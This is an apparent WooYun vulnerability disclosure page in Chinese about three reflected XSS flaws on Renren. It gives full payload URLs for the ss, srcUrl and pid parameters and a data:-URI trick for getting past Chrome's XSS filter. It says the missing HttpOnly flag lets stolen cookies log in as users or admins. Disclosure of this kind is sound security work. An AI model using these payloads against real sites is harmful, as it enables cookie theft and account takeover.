当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035877

漏洞标题:人人网三个XSS可以盗取cookie并成功登录

相关厂商:人人网

漏洞作者: px1624

提交时间:2013-09-02 14:52

修复时间:2013-10-17 14:52

公开时间:2013-10-17 14:52

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-02: 细节已通知厂商并且等待厂商处理中
2013-09-02: 厂商已经确认,细节仅向厂商公开
2013-09-12: 细节向核心白帽子及相关领域专家公开
2013-09-22: 细节向普通白帽子公开
2013-10-02: 细节向实习白帽子公开
2013-10-17: 细节向公众公开

简要描述:

人人网的xss危害还是蛮大的,按照一个5rank算的话,3个也有15rank了吧。话说,顺便把我的人人vip给续成年费吧!

详细说明:

一、 直入主题,三个xss:
1 参数ss没过滤:

http://page.renren.com/601740863/index?ss=17017aaaaaaaaaa"><img src=1 onerror=alert(1)>&tr=1

2 参数srcUrl没过滤:

http://3g.renren.com/login.do?srcUrl="><img src=1 onerror=alert(1)>

3 参数pid没过滤:

http://reg.renren.com/xn6227.do?ss=10129&rt=1&surl=http://app.renren.com/reg/reg/profile?pid=699070439llllll"><img src=1 onerror=alert(1)>

二、 说说xss的利用:
由于人人网没有http-only,cookie一站式,所以可以盗取 用户cookie并成功登录,或者骗取管理员cookie登入后台。
下面是用小号,和两个浏览器测试的结果。(成功盗取cookie并登录)

1.png


2.png


三、 细心的人可能发现了,这三个xss只能在IE下执行,谷歌(谷歌内核比如猎豹、360)下会被浏览器干掉onerror后面的东西,导致漏洞威力大打折扣。
不过,我们可以通过瘦子教程中的方法绕过(利用谷歌浏览器的date协议)。
比如:
IE浏览器下:

http://page.renren.com/601740863/index?ss=17017aaaaaaaaaa"><img src=1 onerror=alert(1)>&tr=1

3.png

谷歌浏览器下:

http://page.renren.com/601740863/index?ss=17017aaaaaaaaaa"><script src=data:,alert(1)<!--&tr=1

4.png


哈哈,这样就可以通杀所有浏览器了。

漏洞证明:

详细见上面。

修复方案:

修补:1 过滤存在缺陷的相关参数。
2 年费VIP啊!!!

版权声明:转载请注明来源 px1624@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-09-02 14:54

厂商回复:

感谢!

最新状态:

暂无